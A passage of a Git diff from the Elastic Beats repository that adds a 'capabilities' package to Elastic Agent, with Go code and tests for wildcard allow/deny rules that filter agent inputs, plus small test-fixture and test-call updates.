iQDilZGgZFfRdBrAsw80RogdddfDbeTBWNw/TS4klFP2JZFtMQzqTEoGCrlGqrddYvgNMLeGC2fRaIhmi+DeZEtT4LjiSS1yHlBZpNdhLxWf5vfivPjgO/rmBGc7DCKW41JcvO31Gz3eB3xs/Ytgw213ZMEQJrRBQ/RJhvBrXEmwNyyDlYBMASvy/2OW3e6auNvjdZVCd8hsLsuzGhmFPd6l3+6tXndWw/1OtWEvoyu+h5oeI/AY8sxkWYdifWBPlnPfZuzlxzu9z45EX3a12f4Gnic2ktZnLriXsm4ODS6aeertRY/0EFTtBytVfdPSLscqL4cXrW0+mLvjAYF/4f20Z1hiiGWyewXa6B3WhPS2YGBZEOzIMco6QDrA32pLkrp09eF1uQx/XX3zevHP3plOS5ED64tWzL4x/Xd4OMi/S2913ZFjK/nL8by95pE//9Fejzc26gppGKOl33sDgi3JCllCFU+1A8bPX1Ezlt9RuRvBi+8p4ElkRZsQuRW4fjKsPGRLk9oPfLX+Uq7Zo/3rwQ/10l7z/2ILjvStX6tljsmFL9ODx7p2IMaUr/5JGtJJs5Y1BiRI+Rdz3fdswwxhnh27Fut5kf6GEVgjvva0NXJQSxv77XLfkwOxv1ODfDxW0+DvZStv/+Rt6AWcj03oOfM2NcQ4q/hSn4/Eo0J7HEdk6hDRHfrRyzqHVjbSAuUAdCzBaAqOANjoEcLv57oE6An+tz1/SbQkyi1Uq0arX4X0MsFEl68v8vPT4DesO+HQI99BPQkg8PoQyb1S9RL2pxVq9DcLquFrSb1pXX294fK6p/Eav5PsBfp2P/z//43AAD//+9xxHg=") SupportedMap = make(map[string]Spec) for f, v := range unpacked { diff --git a/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic-endpoint-security.yml b/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic-endpoint-security.yml index b77a83633aef..d81d276f3685 100644 --- a/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic-endpoint-security.yml +++ b/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic-endpoint-security.yml @@ -2,6 +2,7 @@ revision: 5 fleet: agent: id: fleet-agent-id + logging.level: error host: id: host-agent-id api: diff --git a/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic.yml b/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic.yml index 728b4813a4eb..1681926c56e8 100644 --- a/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic.yml +++ b/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic.yml @@ -3,6 +3,7 @@ name: Endpoint Host fleet: agent: id: fleet-agent-id + logging.level: error host: id: host-agent-id access_api_key: VuaCfGcBCdbkQm-e5aOx:ui2lp2axTNmsyakw9tvNnw diff --git a/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go b/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go index 81f03c3b0094..2694ed1cd3fe 100644 --- a/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go +++ b/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go @@ -54,7 +54,7 @@ func TestCmdBinaryOnlyYAML(t *testing.T) { } func TestCmdDaemon(t *testing.T) { - srv := server.New(newErrorLogger(t), nil, nil) + srv := server.New(newErrorLogger(t), nil, nil, nil) require.NoError(t, srv.Start()) defer srv.Stop() @@ -70,7 +70,7 @@ func TestCmdDaemon(t *testing.T) { } func TestCmdDaemonYAML(t *testing.T) { - srv := server.New(newErrorLogger(t), nil, nil) + srv := server.New(newErrorLogger(t), nil, nil, nil) require.NoError(t, srv.Start()) defer srv.Stop() diff --git a/x-pack/elastic-agent/pkg/capabilities/capabilities.go b/x-pack/elastic-agent/pkg/capabilities/capabilities.go new file mode 100644 index 000000000000..b03bef73d8c8 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/capabilities.go @@ -0,0 +1,99 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "errors" + "os" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" + + "gopkg.in/yaml.v2" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" +) + +// Capability provides a way of applying predefined filter to object. +// It's up to capability to determine if capability is applicable on object. +type Capability interface { + // Apply applies capabilities on input and returns true if input should be completely blocked + // otherwise, false and updated input is returned + Apply(interface{}) (interface{}, error) +} + +var ( + // ErrBlocked is returned when capability is blocking. + ErrBlocked = errors.New("capability blocked") +) + +type capabilitiesManager struct { + caps []Capability + reporter status.Reporter +} + +type capabilityFactory func(*logger.Logger, *ruleDefinitions, status.Reporter) (Capability, error) + +// Load loads capabilities files and prepares manager. +func Load(capsFile string, log *logger.Logger, sc status.Controller) (Capability, error) { + handlers := []capabilityFactory{ + newInputsCapability, + newOutputsCapability, + newUpgradesCapability, + } + + cm := &capabilitiesManager{ + caps: make([]Capability, 0), + reporter: sc.RegisterComponentWithPersistance("capabilities", true), + } + + // load capabilities from file + fd, err := os.Open(capsFile) + if err != nil && !os.IsNotExist(err) { + return cm, err + } + + if os.IsNotExist(err) { + log.Infof("capabilities file not found in %s", capsFile) + return cm, nil + } + defer fd.Close() + + definitions := &ruleDefinitions{Capabilities: make([]ruler, 0)} + dec := yaml.NewDecoder(fd) + if err := dec.Decode(&definitions); err != nil { + return cm, err + } + + // make list of handlers out of capabilities definition + for _, h := range handlers { + cap, err := h(log, definitions, cm.reporter) + if err != nil { + return nil, err + } + + if cap == nil { + continue + } + + cm.caps = append(cm.caps, cap) + } + + return cm, nil +} + +func (mgr *capabilitiesManager) Apply(in interface{}) (interface{}, error) { + var err error + // reset health on start, child caps will update to fail if needed + mgr.reporter.Update(state.Healthy, "") + for _, cap := range mgr.caps { + in, err = cap.Apply(in) + if err != nil { + return in, err + } + } + + return in, nil +} diff --git a/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go b/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go new file mode 100644 index 000000000000..46107463151c --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go @@ -0,0 +1,346 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "fmt" + "io" + "os" + "path/filepath" + "testing" + + "github.com/google/go-cmp/cmp" + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" +) + +func TestLoadCapabilities(t *testing.T) { + testCases := []string{ + "filter_metrics", + "allow_metrics", + "deny_logs", + "no_caps", + } + + l, _ := logger.New("test") + + for _, tc := range testCases { + t.Run(tc, func(t *testing.T) { + filename := filepath.Join("testdata", fmt.Sprintf("%s-capabilities.yml", tc)) + controller := status.NewController(l) + caps, err := Load(filename, l, controller) + assert.NoError(t, err) + assert.NotNil(t, caps) + + cfg, configCloser := getConfigWithCloser(t, filepath.Join("testdata", fmt.Sprintf("%s-config.yml", tc))) + defer configCloser.Close() + + mm, err := cfg.ToMapStr() + assert.NoError(t, err) + assert.NotNil(t, mm) + + out, err := caps.Apply(mm) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + resultConfig, ok := out.(map[string]interface{}) + assert.True(t, ok) + + expectedConfig, resultCloser := getConfigWithCloser(t, filepath.Join("testdata", fmt.Sprintf("%s-result.yml", tc))) + defer resultCloser.Close() + + expectedMap, err := expectedConfig.ToMapStr() + fixInputsType(expectedMap) + fixInputsType(resultConfig) + + if !assert.True(t, cmp.Equal(expectedMap, resultConfig)) { + diff := cmp.Diff(expectedMap, resultConfig) + if diff != "" { + t.Errorf("%s mismatch (-want +got):\n%s", tc, diff) + } + } + }) + } +} + +func TestInvalidLoadCapabilities(t *testing.T) { + testCases := []string{ + "invalid", + "invalid_output", + } + + l, _ := logger.New("test") + + for _, tc := range testCases { + t.Run(tc, func(t *testing.T) { + filename := filepath.Join("testdata", fmt.Sprintf("%s-capabilities.yml", tc)) + controller := status.NewController(l) + caps, err := Load(filename, l, controller) + assert.NoError(t, err) + assert.NotNil(t, caps) + + cfg, configCloser := getConfigWithCloser(t, filepath.Join("testdata", fmt.Sprintf("%s-config.yml", tc))) + defer configCloser.Close() + + mm, err := cfg.ToMapStr() + assert.NoError(t, err) + assert.NotNil(t, mm) + + _, err = caps.Apply(mm) + assert.Error(t, err, "should be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + }) + } +} + +func getConfigWithCloser(t *testing.T, cfgFile string) (*config.Config, io.Closer) { + configFile, err := os.Open(cfgFile) + require.NoError(t, err) + + cfg, err := config.NewConfigFrom(configFile) + require.NoError(t, err) + require.NotNil(t, cfg) + + return cfg, configFile +} + +func fixInputsType(mm map[string]interface{}) { + if i, found := mm[inputsKey]; found { + var inputs []interface{} + + if im, ok := i.([]map[string]interface{}); ok { + for _, val := range im { + inputs = append(inputs, val) + } + } else if im, ok := i.([]interface{}); ok { + inputs = im + } + mm[inputsKey] = inputs + } +} + +func TestCapabilityManager(t *testing.T) { + l := newErrorLogger(t) + + t.Run("filter", func(t *testing.T) { + m := getConfig() + mgr := &capabilitiesManager{ + caps: []Capability{ + filterKeywordCap{keyWord: "filter"}, + }, + reporter: status.NewController(l).RegisterComponent("test"), + } + + newIn, err := mgr.Apply(m) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + newMap, ok := newIn.(map[string]string) + assert.True(t, ok, "new input is not a map") + + _, found := newMap["filter"] + assert.False(t, found, "filter does not filter keyword") + + val, found := newMap["key"] + assert.True(t, found, "filter filters additional keys") + assert.Equal(t, "val", val, "filter modifies additional keys") + }) + + t.Run("filter before block", func(t *testing.T) { + m := getConfig() + mgr := &capabilitiesManager{ + caps: []Capability{ + filterKeywordCap{keyWord: "filter"}, + blockCap{}, + }, + reporter: status.NewController(l).RegisterComponent("test"), + } + + newIn, err := mgr.Apply(m) + assert.Error(t, err, "should be failing") + assert.Equal(t, ErrBlocked, err, "should be blocking") + + newMap, ok := newIn.(map[string]string) + assert.True(t, ok, "new input is not a map") + + _, found := newMap["filter"] + assert.False(t, found, "filter does not filter keyword") + + val, found := newMap["key"] + assert.True(t, found, "filter filters additional keys") + assert.Equal(t, "val", val, "filter modifies additional keys") + }) + + t.Run("filter after block", func(t *testing.T) { + m := getConfig() + mgr := &capabilitiesManager{ + caps: []Capability{ + filterKeywordCap{keyWord: "filter"}, + blockCap{}, + }, + reporter: status.NewController(l).RegisterComponent("test"), + } + + newIn, err := mgr.Apply(m) + assert.Error(t, err, "should be failing") + assert.Equal(t, ErrBlocked, err, "should be blocking") + + newMap, ok := newIn.(map[string]string) + assert.True(t, ok, "new input is not a map") + + _, found := newMap["filter"] + assert.False(t, found, "filter does not filter keyword") + + val, found := newMap["key"] + assert.True(t, found, "filter filters additional keys") + assert.Equal(t, "val", val, "filter modifies additional keys") + }) + + t.Run("filter before keep", func(t *testing.T) { + m := getConfig() + mgr := &capabilitiesManager{ + caps: []Capability{ + filterKeywordCap{keyWord: "filter"}, + keepAsIsCap{}, + }, + reporter: status.NewController(l).RegisterComponent("test"), + } + + newIn, err := mgr.Apply(m) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + newMap, ok := newIn.(map[string]string) + assert.True(t, ok, "new input is not a map") + + _, found := newMap["filter"] + assert.False(t, found, "filter does not filter keyword") + + val, found := newMap["key"] + assert.True(t, found, "filter filters additional keys") + assert.Equal(t, "val", val, "filter modifies additional keys") + }) + + t.Run("filter after keep", func(t *testing.T) { + m := getConfig() + mgr := &capabilitiesManager{ + caps: []Capability{ + filterKeywordCap{keyWord: "filter"}, + keepAsIsCap{}, + }, + reporter: status.NewController(l).RegisterComponent("test"), + } + + newIn, err := mgr.Apply(m) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + newMap, ok := newIn.(map[string]string) + assert.True(t, ok, "new input is not a map") + + _, found := newMap["filter"] + assert.False(t, found, "filter does not filter keyword") + + val, found := newMap["key"] + assert.True(t, found, "filter filters additional keys") + assert.Equal(t, "val", val, "filter modifies additional keys") + }) + + t.Run("filter before filter", func(t *testing.T) { + m := getConfig() + mgr := &capabilitiesManager{ + caps: []Capability{ + filterKeywordCap{keyWord: "filter"}, + filterKeywordCap{keyWord: "key"}, + }, + reporter: status.NewController(l).RegisterComponent("test"), + } + + newIn, err := mgr.Apply(m) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + newMap, ok := newIn.(map[string]string) + assert.True(t, ok, "new input is not a map") + + _, found := newMap["filter"] + assert.False(t, found, "filter does not filter keyword") + + _, found = newMap["key"] + assert.False(t, found, "filter filters additional keys") + }) + t.Run("filter after filter", func(t *testing.T) { + m := getConfig() + mgr := &capabilitiesManager{ + caps: []Capability{ + filterKeywordCap{keyWord: "key"}, + filterKeywordCap{keyWord: "filter"}, + }, + reporter: status.NewController(l).RegisterComponent("test"), + } + + newIn, err := mgr.Apply(m) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + newMap, ok := newIn.(map[string]string) + assert.True(t, ok, "new input is not a map") + + _, found := newMap["filter"] + assert.False(t, found, "filter does not filter keyword") + + _, found = newMap["key"] + assert.False(t, found, "filter filters additional keys") + }) +} + +type keepAsIsCap struct{} + +func (keepAsIsCap) Apply(in interface{}) (interface{}, error) { + return in, nil +} + +type blockCap struct{} + +func (blockCap) Apply(in interface{}) (interface{}, error) { + return in, ErrBlocked +} + +type filterKeywordCap struct { + keyWord string +} + +func (f filterKeywordCap) Apply(in interface{}) (interface{}, error) { + mm, ok := in.(map[string]string) + if !ok { + return in, nil + } + + delete(mm, f.keyWord) + return mm, nil +} + +func getConfig() map[string]string { + return map[string]string{ + "filter": "f_val", + "key": "val", + } +} + +func newErrorLogger(t *testing.T) *logger.Logger { + t.Helper() + + loggerCfg := logger.DefaultLoggingConfig() + loggerCfg.Level = logp.ErrorLevel + + log, err := logger.NewFromConfig("", loggerCfg) + require.NoError(t, err) + return log +} diff --git a/x-pack/elastic-agent/pkg/capabilities/expr.go b/x-pack/elastic-agent/pkg/capabilities/expr.go new file mode 100644 index 000000000000..8d22f61d519c --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/expr.go @@ -0,0 +1,37 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import "strings" + +const ( + wild = "*" + separator = "/" +) + +func matchesExpr(pattern, target string) bool { + if pattern == wild { + return true + } + + patternParts := strings.Split(pattern, separator) + targetParts := strings.Split(target, separator) + + if len(patternParts) != len(targetParts) { + return false + } + + for i, pp := range patternParts { + if pp == wild { + continue + } + + if pp != targetParts[i] { + return false + } + } + + return true +} diff --git a/x-pack/elastic-agent/pkg/capabilities/expr_test.go b/x-pack/elastic-agent/pkg/capabilities/expr_test.go new file mode 100644 index 000000000000..2021d68d4a6c --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/expr_test.go @@ -0,0 +1,43 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "fmt" + "testing" + + "gotest.tools/assert" +) + +func TestExpr(t *testing.T) { + cases := []struct { + Pattern string + Value string + ShouldMatch bool + }{ + {"", "", true}, + {"*", "", true}, + {"*", "test", true}, + {"*", "system/test", true}, + {"system/*", "system/test", true}, + {"*/test", "system/test", true}, + {"*/*", "system/test", true}, + {"system/*", "agent/test", false}, + {"*/test", "test/system", false}, + {"*/test", "test", false}, + {"*/*", "test", false}, + } + + for i, tc := range cases { + t.Run(fmt.Sprintf("testcase #%d", i), func(tt *testing.T) { + match := matchesExpr(tc.Pattern, tc.Value) + assert.Equal(t, + tc.ShouldMatch, + match, + fmt.Sprintf("'%s' and '%s' and expecting should match: %v", tc.Pattern, tc.Value, tc.ShouldMatch), + ) + }) + } +} diff --git a/x-pack/elastic-agent/pkg/capabilities/input.go b/x-pack/elastic-agent/pkg/capabilities/input.go new file mode 100644 index 000000000000..6515bd5b7152 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/input.go @@ -0,0 +1,268 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "fmt" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" +) + +const ( + inputsKey = "inputs" +) + +func newInputsCapability(log *logger.Logger, rd *ruleDefinitions, reporter status.Reporter) (Capability, error) { + if rd == nil { + return &multiInputsCapability{log: log, caps: []*inputCapability{}}, nil + } + + caps := make([]*inputCapability, 0, len(rd.Capabilities)) + + for _, r := range rd.Capabilities { + c, err := newInputCapability(log, r, reporter) + if err != nil { + return nil, err + } + + if c != nil { + caps = append(caps, c) + } + } + + return &multiInputsCapability{log: log, caps: caps}, nil +} + +func newInputCapability(log *logger.Logger, r ruler, reporter status.Reporter) (*inputCapability, error) { + cap, ok := r.(*inputCapability) + if !ok { + return nil, nil + } + + cap.log = log + cap.reporter = reporter + return cap, nil +} + +type inputCapability struct { + log *logger.Logger + reporter status.Reporter + Name string `json:"name,omitempty" yaml:"name,omitempty"` + Type string `json:"rule" yaml:"rule"` + Input string `json:"input" yaml:"input"` +} + +func (c *inputCapability) Apply(cfgMap map[string]interface{}) (map[string]interface{}, error) { + inputsIface, ok := cfgMap[inputsKey] + if ok { + if inputs := inputsMap(inputsIface, c.log); inputs != nil { + renderedInputs, err := c.renderInputs(inputs) + if err != nil { + c.log.Errorf("marking inputs failed for capability '%s': %v", c.name(), err) + return cfgMap, err + } + + cfgMap[inputsKey] = renderedInputs + return cfgMap, nil + } + + return cfgMap, nil + } + + return cfgMap, nil +} + +func inputsMap(cfgInputs interface{}, l *logger.Logger) []map[string]interface{} { + if inputs, ok := cfgInputs.([]map[string]interface{}); ok { + return inputs + } + + inputsSet, ok := cfgInputs.([]interface{}) + if !ok { + l.Warn("inputs is not an array") + return nil + } + + inputsMap := make([]map[string]interface{}, 0, len(inputsSet)) + for _, s := range inputsSet { + mm, ok := s.(map[string]interface{}) + if !ok { + continue + } + inputsMap = append(inputsMap, mm) + } + + return inputsMap +} + +func (c *inputCapability) Rule() string { + return c.Type +} + +func (c *inputCapability) name() string { + if c.Name != "" { + return c.Name + } + + t := "A" + if c.Type == denyKey { + t = "D" + } + + // e.g IA(*) or ID(system/*) + c.Name = fmt.Sprintf("I%s(%s)", t, c.Input) + return c.Name +} + +func (c *inputCapability) renderInputs(inputs []map[string]interface{}) ([]map[string]interface{}, error) { + newInputs := make([]map[string]interface{}, 0, len(inputs)) + + for i, input := range inputs { + inputTypeIface, found := input[typeKey] + if !found { + return newInputs, errors.New(fmt.Sprintf("input '%d' is missing type key", i), errors.TypeConfig) + } + + inputType, ok := inputTypeIface.(string) + if !ok { + newInputs = append(newInputs, input) + continue + } + + // if input does not match definition continue + if !matchesExpr(c.Input, inputType) { + newInputs = append(newInputs, input) + continue + } + + if _, found := input[conditionKey]; found { + // we already visited + newInputs = append(newInputs, input) + continue + } + + isSupported := c.Type == allowKey + + input[conditionKey] = isSupported + if !isSupported { + msg := fmt.Sprintf("input '%s' is left out due to capability restriction '%s'", inputType, c.name()) + c.log.Errorf(msg) + c.reporter.Update(state.Degraded, msg) + } + + newInputs = append(newInputs, input) + } + + return newInputs, nil +} + +type multiInputsCapability struct { + caps []*inputCapability + log *logger.Logger +} + +func (c *multiInputsCapability) Apply(in interface{}) (interface{}, error) { + inputsMap, transform, err := configObject(in) + if err != nil { + c.log.Errorf("constructing config object failed for 'multi-inputs' capability '%s': %v", err) + return in, nil + } + if inputsMap == nil { + return in, nil + } + + for _, cap := range c.caps { + // input capability is not blocking + inputsMap, err = cap.Apply(inputsMap) + if err != nil { + return in, err + } + } + + inputsMap, err = c.cleanupInput(inputsMap) + if err != nil { + c.log.Errorf("cleaning up config object failed for capability 'multi-outputs': %v", err) + return in, nil + } + + if transform == nil { + return inputsMap, nil + } + + return transform(inputsMap), nil +} + +func (c *multiInputsCapability) cleanupInput(cfgMap map[string]interface{}) (map[string]interface{}, error) { + inputsIface, found := cfgMap[inputsKey] + if !found { + return cfgMap, nil + } + + inputsList, ok := inputsIface.([]map[string]interface{}) + if !ok { + return nil, fmt.Errorf("inputs must be an array") + } + + newInputs := make([]map[string]interface{}, 0, len(inputsList)) + + for _, inputMap := range inputsList { + acceptValue := true + conditionIface, found := inputMap[conditionKey] + if found { + conditionVal, ok := conditionIface.(bool) + if ok { + acceptValue = conditionVal + } + } + + if !acceptValue { + continue + } + + delete(inputMap, conditionKey) + newInputs = append(newInputs, inputMap) + } + + cfgMap[inputsKey] = newInputs + return cfgMap, nil +} + +func configObject(a interface{}) (map[string]interface{}, func(interface{}) interface{}, error) { + if ast, ok := a.(*transpiler.AST); ok { + fn := func(i interface{}) interface{} { + mm, ok := i.(map[string]interface{}) + if !ok { + return i + } + + ast, err := transpiler.NewAST(mm) + if err != nil { + return i + } + return ast + } + mm, err := ast.Map() + if err != nil { + return nil, nil, err + } + + return mm, fn, nil + } + + if mm, ok := a.(map[string]interface{}); ok { + fn := func(i interface{}) interface{} { + // return as is + return i + } + return mm, fn, nil + } + + return nil, nil, nil +} diff --git a/x-pack/elastic-agent/pkg/capabilities/input_test.go b/x-pack/elastic-agent/pkg/capabilities/input_test.go new file mode 100644 index 000000000000..7a2707d8f83e --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/input_test.go @@ -0,0 +1,399 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "fmt" + "testing" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" + + "github.com/stretchr/testify/assert" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +func TestMultiInput(t *testing.T) { + tr := &testReporter{} + l, _ := logger.New("test") + t.Run("no match", func(t *testing.T) { + + rd := &ruleDefinitions{ + Capabilities: []ruler{&inputCapability{ + Type: "allow", + Input: "something_else", + }}, + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{"system/metrics", "system/logs"} + runMultiInputTest(t, l, rd, expectedInputs, initialInputs) + }) + + t.Run("filters metrics", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&inputCapability{ + Type: "deny", + Input: "system/metrics", + }}, + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{"system/logs"} + runMultiInputTest(t, l, rd, expectedInputs, initialInputs) + }) + + t.Run("allows metrics only", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &inputCapability{ + Type: "allow", + Input: "system/metrics", + }, + &inputCapability{ + Type: "deny", + Input: "*", + }, + }, + } + + initialInputs := []string{"system/metrics", "system/logs", "something_else"} + expectedInputs := []string{"system/metrics"} + runMultiInputTest(t, l, rd, expectedInputs, initialInputs) + }) + + t.Run("allows everything", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&inputCapability{ + Type: "allow", + Input: "*", + }}, + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{"system/metrics", "system/logs"} + runMultiInputTest(t, l, rd, expectedInputs, initialInputs) + }) + + t.Run("deny everything", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&inputCapability{ + Type: "deny", + Input: "*", + }}, + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{} + runMultiInputTest(t, l, rd, expectedInputs, initialInputs) + }) + + t.Run("deny everything with noise", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &inputCapability{ + Type: "deny", + Input: "*", + }, + &inputCapability{ + Type: "allow", + Input: "something_else", + }, + }, + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{} + runMultiInputTest(t, l, rd, expectedInputs, initialInputs) + }) + + t.Run("keep format", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&inputCapability{ + Type: "deny", + Input: "system/metrics", + }}, + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{"system/logs"} + + cap, err := newInputsCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + inputs := getInputs(initialInputs...) + assert.NotNil(t, inputs) + + res, err := cap.Apply(inputs) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + ast, ok := res.(*transpiler.AST) + assert.True(t, ok, "expecting an ast") + + inputsIface, found := transpiler.Lookup(ast, "inputs") + assert.True(t, found, "input not found") + + inputsList, ok := inputsIface.Value().(*transpiler.List) + assert.True(t, ok, "expecting a list for inputs") + + for _, in := range expectedInputs { + var typeFound bool + nodes := inputsList.Value().([]transpiler.Node) + for _, inputNode := range nodes { + typeNode, found := inputNode.Find("type") + assert.True(t, found, "type not found") + + typeNodeStr, ok := typeNode.Value().(*transpiler.StrVal) + assert.True(t, ok, "type node not strval") + inputType, ok := typeNodeStr.Value().(string) + assert.True(t, ok, "input type key not string") + if inputType == in { + typeFound = true + break + } + } + + assert.True(t, typeFound, fmt.Sprintf("input '%s' type key not found", in)) + } + }) + + t.Run("unknown action", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&inputCapability{ + Type: "deny", + Input: "system/metrics", + }}, + } + cap, err := newInputsCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := fleetapi.ActionUpgrade{} + outAfter, err := cap.Apply(apiAction) + + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) +} + +func TestInput(t *testing.T) { + l, _ := logger.New("test") + tr := &testReporter{} + t.Run("invalid rule", func(t *testing.T) { + r := &upgradeCapability{} + cap, err := newInputCapability(l, r, tr) + assert.NoError(t, err, "no error expected") + assert.Nil(t, cap, "cap should not be created") + }) + + t.Run("empty eql", func(t *testing.T) { + r := &inputCapability{ + Type: "allow", + Input: "", + } + cap, err := newInputCapability(l, r, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + }) + + t.Run("valid action - 1/1 match", func(t *testing.T) { + r := &inputCapability{ + Type: "allow", + Input: "system/metrics", + } + + initialInputs := []string{"system/metrics"} + expectedInputs := []string{"system/metrics"} + runInputTest(t, l, r, expectedInputs, initialInputs) + }) + + t.Run("valid action - 0/1 match", func(t *testing.T) { + r := &inputCapability{ + Type: "allow", + Input: "system/metrics", + } + + initialInputs := []string{"system/logs"} + expectedInputs := []string{"system/logs"} + runInputTest(t, l, r, expectedInputs, initialInputs) + }) + + t.Run("valid action - deny metrics", func(t *testing.T) { + r := &inputCapability{ + Type: "deny", + Input: "system/metrics", + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{"system/logs"} + runInputTest(t, l, r, expectedInputs, initialInputs) + }) + + t.Run("valid action - multiple inputs 1 explicitely allowed", func(t *testing.T) { + r := &inputCapability{ + Type: "allow", + Input: "system/metrics", + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{"system/metrics", "system/logs"} + runInputTest(t, l, r, expectedInputs, initialInputs) + }) + +} + +func runInputTest(t *testing.T, l *logger.Logger, r *inputCapability, expectedInputs []string, initialInputs []string) { + tr := &testReporter{} + cap, err := newInputCapability(l, r, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + inputs := getInputsMap(initialInputs...) + assert.NotNil(t, inputs) + + newMap, err := cap.Apply(inputs) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + inputsNode, found := newMap["inputs"] + assert.True(t, found, "inputsnot found") + + inputsList, ok := inputsNode.([]map[string]interface{}) + assert.True(t, ok, "inputs not a list") + + typesMap := make(map[string]bool) + for _, node := range inputsList { + typeNode, ok := node["type"] + if !ok { + continue + } + + inputType, ok := 